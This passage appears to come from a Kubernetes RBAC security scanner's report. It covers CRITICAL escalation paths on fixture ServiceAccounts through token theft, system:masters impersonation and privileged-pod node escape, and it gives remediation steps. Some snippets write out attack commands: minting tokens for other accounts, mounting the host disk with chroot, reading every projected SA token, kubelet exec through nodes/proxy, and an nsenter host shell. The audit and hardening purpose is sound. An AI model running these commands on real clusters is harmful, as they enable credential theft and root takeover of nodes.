    Gives the attacker can mint tokens for ServiceAccount rbac-fixtures/sa-impersonate
  2. Step 2 of 2 Impersonation of system:masters impersonate_system_masters

    The impersonate verb on groups: ["*"] (or explicitly on system:masters) lets the holder send requests as the hard-coded system:masters group. The kube-apiserver short-circuits authorization for that group, so every API call succeeds regardless of RBAC.

    This is the worst-case impersonation grant: it bypasses the cluster's entire RBAC layer rather than borrowing another principal's permissions.

    From ServiceAccount/rbac-fixtures/sa-impersonate
    Permission granted impersonate groups
    Gives the attacker can impersonate the system:masters group, bypassing all RBAC
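Step 1 in practice is a single request against the TokenRequest subresource; no pod is created, and the token lives for whatever duration the attacker requests, subject to the API server's cap (the duration below is illustrative):

    # With the sa-token-create token in hand:
    kubectl --token="$ATTACKER_TOKEN" -n rbac-fixtures create token sa-impersonate --duration=1h
    # Equivalent raw call: POST /api/v1/namespaces/rbac-fixtures/serviceaccounts/sa-impersonate/token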
Remediation
Remove every impersonate grant on a path to system:masters. Concretely: remove the impersonate groups capability that enables hop 2 (ServiceAccount/rbac-fixtures/sa-impersonate/).
  1. List subjects with impersonate: kubectl get rolebindings,clusterrolebindings -A -o json | jq '.items[] | select(.subjects[]? | .kind == "User" or .kind == "Group" or .kind == "ServiceAccount") | .metadata.name + " → " + (.roleRef.name)' then check each role's rules for impersonate.
  2. Almost no production workload genuinely needs impersonate users/groups. Kubectl plugins/dashboards that *do* need it should use kubectl --as=... from a human admin's session, not a workload SA.
  3. Break the chain: remove the impersonate groups capability that enables hop 2 (ServiceAccount/rbac-fixtures/sa-impersonate/).
  4. For kubectl-as-a-service workloads, scope the impersonation with resourceNames: [<allowed-user>] to a fixed allowlist of principals; *never* users: [*] or groups: [*].
  5. Wire admission policy: a Kyverno rule that fails any RoleBinding granting impersonate to a non-system subject without an explicit resourceNames carve-out.
CRITICAL ServiceAccount/vulnerable/privileged-reader Cluster 9.1
ServiceAccount/vulnerable/privileged-reader can impersonate `system:masters` in 2 hop(s), bypassing all RBAC
Scope · Cluster Source ServiceAccount/vulnerable/privileged-reader → system:masters: terminal sink is cluster-scoped (full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/vulnerable/privileged-reader

Subject ServiceAccount/vulnerable/privileged-reader can chain into the ability to impersonate the system:masters group. system:masters is special: the kube-apiserver hard-codes it as authorized for *every* operation regardless of RBAC. There is no Role or ClusterRole that grants system:masters reach. It is a pre-RBAC carve-out for kubeadm control-plane operators (cert-based auth with O=system:masters skips authorization entirely).

The chain (2 hop(s); each step is an RBAC verb the engine validated):
1. ServiceAccount/vulnerable/privileged-reader → ServiceAccount/rbac-fixtures/sa-impersonate via pod_create_token_theft (create pods): can create pods that mount ServiceAccount rbac-fixtures/sa-impersonate
2. ServiceAccount/rbac-fixtures/sa-impersonate/ via impersonate_system_masters (impersonate groups): can impersonate the system:masters group, bypassing all RBAC

Impersonation of system:masters is the rarest but most severe finding type. Most clusters do not give workload SAs impersonate on users/groups, and system:masters is the pathological consequence when they do: a single impersonate grant on a workload SA is the entire chain. CIS Kubernetes 5.1.4 and the RBAC good-practices guide explicitly call out impersonation grants for review.

Impact Impersonating system:masters bypasses every RBAC check the cluster ever had. Every API call succeeds. Audit logs are written but the actor field shows the impersonated principal; attribution requires reading the impersonate audit annotation.
How an attacker abuses this
Background
Subject: ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any workload bound to ServiceAccount/vulnerable/privileged-reader.
  2. Acting as ServiceAccount/vulnerable/privileged-reader, the attacker creates a pod that mounts the ServiceAccount/rbac-fixtures/sa-impersonate ServiceAccount and then reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside the container. The pod becomes a token-theft primitive: any ServiceAccount the attacker can mount, they can lift.
  3. Acting as ServiceAccount/rbac-fixtures/sa-impersonate, the attacker impersonates the system:masters group (impersonate groups). The kube-apiserver hard-codes that group as authorized for every operation regardless of RBAC. A single such grant collapses the entire authorization layer.
  4. Final step: attacker can impersonate group system:masters. The kube-apiserver short-circuits authorization for system:masters via the static token / certificate path, bypassing every RBAC check. They are now indistinguishable from a kubeadm control-plane operator.
  1. Step 1 of 2 Pod creation → ServiceAccount token theft pod_create_token_theft

    Anyone who can create pods in a namespace can mount any ServiceAccount in that namespace into the pod. Cluster-scoped pod-create lets you mount any ServiceAccount in any namespace. Once the pod is running, the attacker reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside it, and now holds a token for that SA.

    This is the single most common privilege-escalation pattern in production Kubernetes.

    From ServiceAccount/vulnerable/privileged-reader → ServiceAccount/rbac-fixtures/sa-impersonate
    Permission granted create pods
    Gives the attacker can create pods that mount ServiceAccount rbac-fixtures/sa-impersonate
  2. Step 2 of 2 Impersonation of system:masters impersonate_system_masters

    The impersonate verb on groups: ["*"] (or explicitly on system:masters) lets the holder send requests as the hard-coded system:masters group. The kube-apiserver short-circuits authorization for that group, so every API call succeeds regardless of RBAC.

    This is the worst-case impersonation grant: it bypasses the cluster's entire RBAC layer rather than borrowing another principal's permissions.

    From ServiceAccount/rbac-fixtures/sa-impersonate
    Permission granted impersonate groups
    Gives the attacker can impersonate the system:masters group, bypassing all RBAC
Remediation
Remove every impersonate grant on a path to system:masters. Concretely: remove the impersonate groups capability that enables hop 2 (ServiceAccount/rbac-fixtures/sa-impersonate/).
  1. List subjects with impersonate: kubectl get rolebindings,clusterrolebindings -A -o json | jq '.items[] | select(.subjects[]? | .kind == "User" or .kind == "Group" or .kind == "ServiceAccount") | .metadata.name + " → " + (.roleRef.name)' then check each role's rules for impersonate.
  2. Almost no production workload genuinely needs impersonate users/groups. Kubectl plugins/dashboards that *do* need it should use kubectl --as=... from a human admin's session, not a workload SA.
  3. Break the chain: remove the impersonate groups capability that enables hop 2 (ServiceAccount/rbac-fixtures/sa-impersonate/).
  4. For kubectl-as-a-service workloads, scope the impersonation with resourceNames: [<allowed-user>] to a fixed allowlist of principals; *never* users: [*] or groups: [*].
  5. Wire admission policy: a Kyverno rule that fails any RoleBinding granting impersonate to a non-system subject without an explicit resourceNames carve-out.
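A complement to step 1 that filters on the verb directly rather than listing every binding (a sketch; repeat with kubectl get roles -A for namespaced Roles):

    kubectl get clusterroles -o json \
      | jq -r '.items[] | select(any(.rules[]?.verbs[]?; . == "impersonate")) | .metadata.name'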
CRITICAL

Subjects can reach node escape (host root) in 1 hop(s)

KUBE-PRIVESC-PATH-NODE-ESCAPE 6 subjects Score 9.4–8.9

Affected subjects (6)

CRITICAL ServiceAccount/psa-suppressed/default Cluster 9.4
ServiceAccount/psa-suppressed/default can reach node escape (host root) in 1 hop(s)
Scope · Cluster Source ServiceAccount/psa-suppressed/default → node escape: terminal sink is cluster-scoped (full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/psa-suppressed/default

Subject ServiceAccount/psa-suppressed/default has a privesc path that terminates in the ability to schedule a pod with host-level access (hostPath: /, privileged: true, hostPID, or hostNetwork), which is structurally equivalent to root on the worker node. Once an attacker has node root, all defense-in-depth at the Kubernetes layer is bypassed: pod isolation depends on the kernel and runtime, not on RBAC, and node root reads every other pod's filesystem (including projected ServiceAccount tokens) and every kubelet credential.

The chain (1 hop(s); each step uses an explicit RBAC verb or pod primitive the engine validated):
1. ServiceAccount/psa-suppressed/default/ via pod_host_escape (privileged): runs in pod psa-suppressed/psa-priv-app-54c64bdd84-rggt6 with privileged

Node escape is qualitatively different from cluster-admin: cluster-admin gives API control; node escape gives *operational* control over a host. With node root the attacker can plant a persistent rootkit, install a kernel module, capture every container's network traffic via tcpdump on the host's cni0/flannel.1/cali* interface, and exfiltrate every projected ServiceAccount token by reading /var/lib/kubelet/pods/*/volumes/.../token. From there, those tokens cascade into more cluster-admin paths.

Impact Compromise of ServiceAccount/psa-suppressed/default yields host root on a worker node. Every co-located pod's filesystem and every projected SA token are immediately readable, and the kubelet client cert can be used to access node-level APIs.
How an attacker abuses this
Background
Subject: ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any workload or credential bound to ServiceAccount/psa-suppressed/default.
  2. Acting as ServiceAccount/psa-suppressed/default, the attacker schedules a pod with host-level access (privileged: true, hostPath: /, hostPID, or hostNetwork) and escapes onto the underlying node. From there they read every co-located pod's filesystem, every projected ServiceAccount token on that node, and the kubelet's client cert.
  3. Final step: a privileged pod with hostPath: / (or hostPID + privileged: true) is created. The attacker runs chroot /host bash and is now root on the worker node, reading every other pod's filesystem, every projected ServiceAccount token on that node, and the kubelet client cert.
  1. Container escape to host pod_host_escape

    The pod is configured in a way that makes escaping to the underlying node trivial: privileged: true, hostPID, hostNetwork, or a sensitive hostPath mount (root, docker.sock, etc.). An attacker who controls the container reaches root on the node, then has access to every pod and kubelet credential on that node.

    From ServiceAccount/psa-suppressed/default
    Permission granted privileged
    Gives the attacker runs in pod psa-suppressed/psa-priv-app-54c64bdd84-rggt6 with privileged
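What that single hop looks like from inside the privileged container (device name and paths are assumptions; run only against infrastructure you own):

    lsblk                                      # identify the node's root device, e.g. /dev/vda1
    mkdir -p /host && mount /dev/vda1 /host    # mount the host filesystem into the container
    ls /host/var/lib/kubelet/pods/*/volumes/kubernetes.io~projected/*/token   # every projected SA token on the node
    chroot /host /bin/bash                     # interactive root shell on the worker node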
Remediation
Break the chain by either (a) removing the pod-creation primitive that enables node escape, or (b) constraining what privileged settings the chain's pods can request. Lowest-cost cut: remove the permission privileged that enables the first hop (ServiceAccount/psa-suppressed/default/).
  1. Identify which hop ends in pod_create_* or grants Pod Security violations (privileged, hostPath, hostPID, hostNetwork).
  2. Apply Pod Security Admission restricted profile to namespaces reachable from this chain: kubectl label namespace <ns> pod-security.kubernetes.io/enforce=restricted. This blocks privileged pods at admission.
  3. Audit any namespace that is privileged-labeled. DaemonSets and operators that genuinely need host access should run in a dedicated namespace not reachable via tenant chains.
  4. Remove the cited capability: remove the permission privileged that enables the first hop (ServiceAccount/psa-suppressed/default/).
  5. Wire admission policy (Kyverno restrict-host-path-mount, disallow-privileged-containers) so future pods cannot regress.
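The step-2 label command, expressed as a namespace manifest with audit and warn added so violations surface in logs as well as being blocked (namespace name is a placeholder):

    apiVersion: v1
    kind: Namespace
    metadata:
      name: tenant-namespace               # apply to each namespace reachable from this chain
      labels:
        pod-security.kubernetes.io/enforce: restricted
        pod-security.kubernetes.io/audit: restricted
        pod-security.kubernetes.io/warn: restricted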
CRITICAL ServiceAccount/rbac-fixtures/sa-nodes-proxy Cluster 9.4
ServiceAccount/rbac-fixtures/sa-nodes-proxy can reach node escape (host root) in 1 hop(s)
Scope · Cluster Source ServiceAccount/rbac-fixtures/sa-nodes-proxy → node escape: terminal sink is cluster-scoped (full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-nodes-proxy

Subject ServiceAccount/rbac-fixtures/sa-nodes-proxy has a privesc path that terminates in the ability to schedule a pod with host-level access (hostPath: /, privileged: true, hostPID, or hostNetwork), which is structurally equivalent to root on the worker node. Once an attacker has node root, all defense-in-depth at the Kubernetes layer is bypassed: pod isolation depends on the kernel and runtime, not on RBAC, and node root reads every other pod's filesystem (including projected ServiceAccount tokens) and every kubelet credential.

The chain (1 hop(s); each step uses an explicit RBAC verb or pod primitive the engine validated):
1. ServiceAccount/rbac-fixtures/sa-nodes-proxy/ via nodes_proxy (get nodes/proxy): can reach kubelet API via nodes/proxy WebSocket verb confusion

Node escape is qualitatively different from cluster-admin: cluster-admin gives API control; node escape gives *operational* control over a host. With node root the attacker can plant a persistent rootkit, install a kernel module, capture every container's network traffic via tcpdump on the host's cni0/flannel.1/cali* interface, and exfiltrate every projected ServiceAccount token by reading /var/lib/kubelet/pods/*/volumes/.../token. From there, those tokens cascade into more cluster-admin paths.

Impact Compromise of ServiceAccount/rbac-fixtures/sa-nodes-proxy yields host root on a worker node. Every co-located pod's filesystem and every projected SA token are immediately readable, and the kubelet client cert can be used to access node-level APIs.
How an attacker abuses this
Background
Subject: ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any workload or credential bound to ServiceAccount/rbac-fixtures/sa-nodes-proxy.
  2. Acting as ServiceAccount/rbac-fixtures/sa-nodes-proxy, the attacker uses nodes/proxy (get nodes/proxy) to forward requests directly to the kubelet on each node. Combined with the kubelet's /exec endpoint this becomes a primitive for running commands inside any pod the kubelet can see.
  3. Final step: a privileged pod with hostPath: / (or hostPID + privileged: true) is created. The attacker runs chroot /host bash and is now root on the worker node, reading every other pod's filesystem, every projected ServiceAccount token on that node, and the kubelet client cert.
  1. nodes/proxy → kubelet API nodes_proxy

    The nodes/proxy subresource forwards requests to the kubelet on each node. Combined with kubelet's /exec endpoint and a WebSocket verb mismatch, this becomes a primitive for executing commands inside any pod the kubelet can reach.

    From ServiceAccount/rbac-fixtures/sa-nodes-proxy
    Permission granted get nodes/proxy
    Gives the attacker can reach kubelet API via nodes/proxy WebSocket verb confusion
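What the nodes/proxy hop looks like in practice (node, namespace, and pod names are placeholders; the exec path is shown only to illustrate why get on this subresource is so dangerous):

    # List every pod the kubelet on <node> is running, straight through the API server:
    kubectl --token="$TOKEN" get --raw "/api/v1/nodes/<node>/proxy/pods"
    # The kubelet's exec endpoint sits behind the same proxy:
    #   /api/v1/nodes/<node>/proxy/exec/<namespace>/<pod>/<container>?command=id&input=1&output=1&tty=1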
Remediation
Break the chain by either (a) removing the pod-creation primitive that enables node escape, or (b) constraining what privileged settings the chain's pods can request. Lowest-cost cut: remove the permission get nodes/proxy that enables the first hop (ServiceAccount/rbac-fixtures/sa-nodes-proxy/).
  1. Identify which hop ends in pod_create_* or grants Pod Security violations (privileged, hostPath, hostPID, hostNetwork).
  2. Apply Pod Security Admission restricted profile to namespaces reachable from this chain: kubectl label namespace <ns> pod-security.kubernetes.io/enforce=restricted. This blocks privileged pods at admission.
  3. Audit any namespace that is privileged-labeled. DaemonSets and operators that genuinely need host access should run in a dedicated namespace not reachable via tenant chains.
  4. Remove the cited capability: remove the permission get nodes/proxy that enables the first hop (ServiceAccount/rbac-fixtures/sa-nodes-proxy/).
  5. Wire admission policy (Kyverno restrict-host-path-mount, disallow-privileged-containers) so future pods cannot regress.
CRITICAL ServiceAccount/vulnerable/default Cluster 9.4
ServiceAccount/vulnerable/default can reach node escape (host root) in 1 hop(s)
Scope · Cluster Source ServiceAccount/vulnerable/default → node escape: terminal sink is cluster-scoped (full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/vulnerable/default

Subject ServiceAccount/vulnerable/default has a privesc path that terminates in the ability to schedule a pod with host-level access (hostPath: /, privileged: true, hostPID, or hostNetwork), which is structurally equivalent to root on the worker node. Once an attacker has node root, all defense-in-depth at the Kubernetes layer is bypassed: pod isolation depends on the kernel and runtime, not on RBAC, and node root reads every other pod's filesystem (including projected ServiceAccount tokens) and every kubelet credential.

The chain (1 hop(s); each step uses an explicit RBAC verb or pod primitive the engine validated):
1. ServiceAccount/vulnerable/default/ via pod_host_escape (hostPID,hostIPC): runs in pod vulnerable/host-ns-app-7cb46d5788-8xp2h with hostPID, hostIPC

Node escape is qualitatively different from cluster-admin: cluster-admin gives API control; node escape gives *operational* control over a host. With node root the attacker can plant a persistent rootkit, install a kernel module, capture every container's network traffic via tcpdump on the host's cni0/flannel.1/cali* interface, and exfiltrate every projected ServiceAccount token by reading /var/lib/kubelet/pods/*/volumes/.../token. From there, those tokens cascade into more cluster-admin paths.

Impact Compromise of ServiceAccount/vulnerable/default yields host root on a worker node. Every co-located pod's filesystem and every projected SA token are immediately readable, and the kubelet client cert can be used to access node-level APIs.
How an attacker abuses this
Background
Subject: ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any workload or credential bound to ServiceAccount/vulnerable/default.
  2. Acting as ServiceAccount/vulnerable/default, the attacker schedules a pod with host-level access (privileged: true, hostPath: /, hostPID, or hostNetwork) and escapes onto the underlying node. From there they read every co-located pod's filesystem, every projected ServiceAccount token on that node, and the kubelet's client cert.
  3. Final step: a privileged pod with hostPath: / (or hostPID + privileged: true) is created. The attacker runs chroot /host bash and is now root on the worker node, reading every other pod's filesystem, every projected ServiceAccount token on that node, and the kubelet client cert.
  1. Container escape to host pod_host_escape

    The pod is configured in a way that makes escaping to the underlying node trivial: privileged: true, hostPID, hostNetwork, or a sensitive hostPath mount (root, docker.sock, etc.). An attacker who controls the container reaches root on the node, then has access to every pod and kubelet credential on that node.

    From ServiceAccount/vulnerable/default
    Permission granted hostPID,hostIPC
    Gives the attacker runs in pod vulnerable/host-ns-app-7cb46d5788-8xp2h with hostPID, hostIPC
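A sketch of what hostPID and hostIPC expose from inside this container (the nsenter step additionally assumes the container runs as root with sufficient capabilities, e.g. privileged):

    ps aux                                    # the host's full process table is visible via hostPID
    cat /proc/1/environ | tr '\0' '\n'        # environment of host PID 1, if readable
    nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/sh   # full host shell when privileges allow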
Remediation
Break the chain by either (a) removing the pod-creation primitive that enables node escape, or (b) constraining what privileged settings the chain's pods can request. Lowest-cost cut: remove the permission hostPID,hostIPC that enables the first hop (ServiceAccount/vulnerable/default/).
  1. Identify which hop ends in pod_create_* or grants Pod Security violations (privileged, hostPath, hostPID, hostNetwork).
  2. Apply Pod Security Admission restricted profile to namespaces reachable from this chain: kubectl label namespace <ns> pod-security.kubernetes.io/enforce=restricted. This blocks privileged pods at admission.
  3. Audit any namespace that is privileged-labeled. DaemonSets and operators that genuinely need host access should run in a dedicated namespace not reachable via tenant chains.
  4. Remove the cited capability: remove the permission hostPID,hostIPC that enables the first hop (ServiceAccount/vulnerable/default/).
  5. Wire admission policy (Kyverno restrict-host-path-mount, disallow-privileged-containers) so future pods cannot regress.
CRITICAL ServiceAccount/rbac-fixtures/sa-pod-create Cluster 8.9
ServiceAccount/rbac-fixtures/sa-pod-create can reach node escape (host root) in 2 hop(s)
Scope · Cluster Source ServiceAccount/rbac-fixtures/sa-pod-create → node escape: terminal sink is cluster-scoped (full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-pod-create

Subject ServiceAccount/rbac-fixtures/sa-pod-create has a privesc path that terminates in the ability to schedule a pod with host-level access (hostPath: /, privileged: true, hostPID, or hostNetwork), which is structurally equivalent to root on the worker node. Once an attacker has node root, all defense-in-depth at the Kubernetes layer is bypassed: pod isolation depends on the kernel and runtime, not on RBAC, and node root reads every other pod's filesystem (including projected ServiceAccount tokens) and every kubelet credential.

The chain (2 hop(s); each step uses an explicit RBAC verb or pod primitive the engine validated):
1. ServiceAccount/rbac-fixtures/sa-pod-create → ServiceAccount/psa-suppressed/default via pod_create_token_theft (create pods): can create pods that mount ServiceAccount psa-suppressed/default
2. ServiceAccount/psa-suppressed/default/ via pod_host_escape (privileged): runs in pod psa-suppressed/psa-priv-app-54c64bdd84-rggt6 with privileged

Node escape is qualitatively different from cluster-admin: cluster-admin gives API control; node escape gives *operational* control over a host. With node root the attacker can plant a persistent rootkit, install a kernel module, capture every container's network traffic via tcpdump on the host's cni0/flannel.1/cali* interface, and exfiltrate every projected ServiceAccount token by reading /var/lib/kubelet/pods/*/volumes/.../token. From there, those tokens cascade into more cluster-admin paths.

Impact Compromise of ServiceAccount/rbac-fixtures/sa-pod-create yields host root on a worker node. Every co-located pod's filesystem and every projected SA token are immediately readable, and the kubelet client cert can be used to access node-level APIs.
How an attacker abuses this
Background
Subject: ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any workload or credential bound to ServiceAccount/rbac-fixtures/sa-pod-create.
  2. Acting as ServiceAccount/rbac-fixtures/sa-pod-create, the attacker creates a pod that mounts the ServiceAccount/psa-suppressed/default ServiceAccount and then reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside the container. The pod becomes a token-theft primitive: any ServiceAccount the attacker can mount, they can lift.
  3. Acting as ServiceAccount/psa-suppressed/default, the attacker schedules a pod with host-level access (privileged: true, hostPath: /, hostPID, or hostNetwork) and escapes onto the underlying node. From there they read every co-located pod's filesystem, every projected ServiceAccount token on that node, and the kubelet's client cert.
  4. Final step: a privileged pod with hostPath: / (or hostPID + privileged: true) is created. The attacker runs chroot /host bash and is now root on the worker node, reading every other pod's filesystem, every projected ServiceAccount token on that node, and the kubelet client cert.
  1. Step 1 of 2 Pod creation → ServiceAccount token theft pod_create_token_theft

    Anyone who can create pods in a namespace can mount any ServiceAccount in that namespace into the pod. Cluster-scoped pod-create lets you mount any ServiceAccount in any namespace. Once the pod is running, the attacker reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside it, and now holds a token for that SA.

    This is the single most common privilege-escalation pattern in production Kubernetes.

    From ServiceAccount/rbac-fixtures/sa-pod-create → ServiceAccount/psa-suppressed/default
    Permission granted create pods
    Gives the attacker can create pods that mount ServiceAccount psa-suppressed/default
  2. Step 2 of 2 Container escape to host pod_host_escape

    The pod is configured in a way that makes escaping to the underlying node trivial: privileged: true, hostPID, hostNetwork, or a sensitive hostPath mount (root, docker.sock, etc.). An attacker who controls the container reaches root on the node, then has access to every pod and kubelet credential on that node.

    From ServiceAccount/psa-suppressed/default
    Permission granted privileged
    Gives the attacker runs in pod psa-suppressed/psa-priv-app-54c64bdd84-rggt6 with privileged
Remediation
Break the chain by either (a) removing the pod-creation primitive that enables node escape, or (b) constraining what privileged settings the chain's pods can request. Lowest-cost cut: remove the create pods capability that enables hop 1 (ServiceAccount/rbac-fixtures/sa-pod-create → ServiceAccount/psa-suppressed/default).
  1. Identify which hop ends in pod_create_* or grants Pod Security violations (privileged, hostPath, hostPID, hostNetwork).
  2. Apply Pod Security Admission restricted profile to namespaces reachable from this chain: kubectl label namespace <ns> pod-security.kubernetes.io/enforce=restricted. This blocks privileged pods at admission.
  3. Audit any namespace that is privileged-labeled. DaemonSets and operators that genuinely need host access should run in a dedicated namespace not reachable via tenant chains.
  4. Remove the cited capability: remove the create pods capability that enables hop 1 (ServiceAccount/rbac-fixtures/sa-pod-create → ServiceAccount/psa-suppressed/default).
  5. Wire admission policy (Kyverno restrict-host-path-mount, disallow-privileged-containers) so future pods cannot regress.
CRITICAL ServiceAccount/rbac-fixtures/sa-token-create Cluster 8.9
ServiceAccount/rbac-fixtures/sa-token-create can reach node escape (host root) in 2 hop(s)
Scope · Cluster Source ServiceAccount/rbac-fixtures/sa-token-create → node escape: terminal sink is cluster-scoped (full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-token-create

Subject ServiceAccount/rbac-fixtures/sa-token-create has a privesc path that terminates in the ability to schedule a pod with host-level access (hostPath: /, privileged: true, hostPID, or hostNetwork), which is structurally equivalent to root on the worker node. Once an attacker has node root, all defense-in-depth at the Kubernetes layer is bypassed: pod isolation depends on the kernel and runtime, not on RBAC, and node root reads every other pod's filesystem (including projected ServiceAccount tokens) and every kubelet credential.

The chain (2 hop(s); each step uses an explicit RBAC verb or pod primitive the engine validated):
1. ServiceAccount/rbac-fixtures/sa-token-create → ServiceAccount/psa-suppressed/default via token_request (create serviceaccounts/token): can mint tokens for ServiceAccount psa-suppressed/default
2. ServiceAccount/psa-suppressed/default/ via pod_host_escape (privileged): runs in pod psa-suppressed/psa-priv-app-54c64bdd84-rggt6 with privileged

Node escape is qualitatively different from cluster-admin: cluster-admin gives API control; node escape gives *operational* control over a host. With node root the attacker can plant a persistent rootkit, install a kernel module, capture every container's network traffic via tcpdump on the host's cni0/flannel.1/cali* interface, and exfiltrate every projected ServiceAccount token by reading /var/lib/kubelet/pods/*/volumes/.../token. From there, those tokens cascade into more cluster-admin paths.

Impact Compromise of ServiceAccount/rbac-fixtures/sa-token-create yields host root on a worker node. Every co-located pod's filesystem and every projected SA token are immediately readable, and the kubelet client cert can be used to access node-level APIs.
How an attacker abuses this
Background
Subject: ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any workload or credential bound to ServiceAccount/rbac-fixtures/sa-token-create.
  2. Acting as ServiceAccount/rbac-fixtures/sa-token-create, the attacker calls the serviceaccounts/token subresource (create serviceaccounts/token) to mint a fresh, valid token for ServiceAccount/psa-suppressed/default. No pod creation required, and a thinner audit trail than the pod-mount route.
  3. Acting as ServiceAccount/psa-suppressed/default, the attacker schedules a pod with host-level access (privileged: true, hostPath: /, hostPID, or hostNetwork) and escapes onto the underlying node. From there they read every co-located pod's filesystem, every projected ServiceAccount token on that node, and the kubelet's client cert.
  4. Final step: a privileged pod with hostPath: / (or hostPID + privileged: true) is created. The attacker runs chroot /host bash and is now root on the worker node, reading every other pod's filesystem, every projected ServiceAccount token on that node, and the kubelet client cert.
  1. Step 1 of 2 TokenRequest minting token_request

    The create verb on serviceaccounts/token mints a fresh, valid token for any ServiceAccount in scope, with no pod required. Cleaner than the pod-creation route and harder to spot in audit logs.

    From ServiceAccount/rbac-fixtures/sa-token-create → ServiceAccount/psa-suppressed/default
    Permission granted create serviceaccounts/token
    Gives the attacker can mint tokens for ServiceAccount psa-suppressed/default
  2. Step 2 of 2 Container escape to host pod_host_escape

    The pod is configured in a way that makes escaping to the underlying node trivial: privileged: true, hostPID, hostNetwork, or a sensitive hostPath mount (root, docker.sock, etc.). An attacker who controls the container reaches root on the node, then has access to every pod and kubelet credential on that node.

    From ServiceAccount/psa-suppressed/default
    Permission granted privileged
    Gives the attacker runs in pod psa-suppressed/psa-priv-app-54c64bdd84-rggt6 with privileged
Remediation
Break the chain by either (a) removing the pod-creation primitive that enables node escape, or (b) constraining what privileged settings the chain's pods can request. Lowest-cost cut: remove the permission create serviceaccounts/token that enables the first hop (ServiceAccount/rbac-fixtures/sa-token-create → ServiceAccount/psa-suppressed/default).
  1. Identify which hop ends in pod_create_* or grants Pod Security violations (privileged, hostPath, hostPID, hostNetwork).
  2. Apply Pod Security Admission restricted profile to namespaces reachable from this chain: kubectl label namespace <ns> pod-security.kubernetes.io/enforce=restricted. This blocks privileged pods at admission.
  3. Audit any namespace that is privileged-labeled. DaemonSets and operators that genuinely need host access should run in a dedicated namespace not reachable via tenant chains.
  4. Remove the cited capability: remove the permission create serviceaccounts/token that enables the first hop (ServiceAccount/rbac-fixtures/sa-token-create → ServiceAccount/psa-suppressed/default).
  5. Wire admission policy (Kyverno restrict-host-path-mount, disallow-privileged-containers) so future pods cannot regress.
CRITICAL ServiceAccount/vulnerable/privileged-reader Cluster 8.9
ServiceAccount/vulnerable/privileged-reader can reach node escape (host root) in 2 hop(s)
Scope · Cluster Source ServiceAccount/vulnerable/privileged-reader → node escape: terminal sink is cluster-scoped (full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/vulnerable/privileged-reader

Subject ServiceAccount/vulnerable/privileged-reader has a privesc path that terminates in the ability to schedule a pod with host-level access (hostPath: /, privileged: true, hostPID, or hostNetwork), which is structurally equivalent to root on the worker node. Once an attacker has node root, all defense-in-depth at the Kubernetes layer is bypassed: pod isolation depends on the kernel and runtime, not on RBAC, and node root reads every other pod's filesystem (including projected ServiceAccount tokens) and every kubelet credential.

The chain (2 hop(s); each step uses an explicit RBAC verb or pod primitive the engine validated):
1. ServiceAccount/vulnerable/privileged-reader → ServiceAccount/vulnerable/default via pod_create_token_theft (create pods): can create pods that mount ServiceAccount vulnerable/default
2. ServiceAccount/vulnerable/default/ via pod_host_escape (hostPID,hostIPC): runs in pod vulnerable/host-ns-app-7cb46d5788-8xp2h with hostPID, hostIPC

Node escape is qualitatively different from cluster-admin: cluster-admin gives API control; node escape gives *operational* control over a host. With node root the attacker can plant a persistent rootkit, install a kernel module, capture every container's network traffic via tcpdump on the host's cni0/flannel.1/cali* interface, and exfiltrate every projected ServiceAccount token by reading /var/lib/kubelet/pods/*/volumes/.../token. From there, those tokens cascade into more cluster-admin paths.

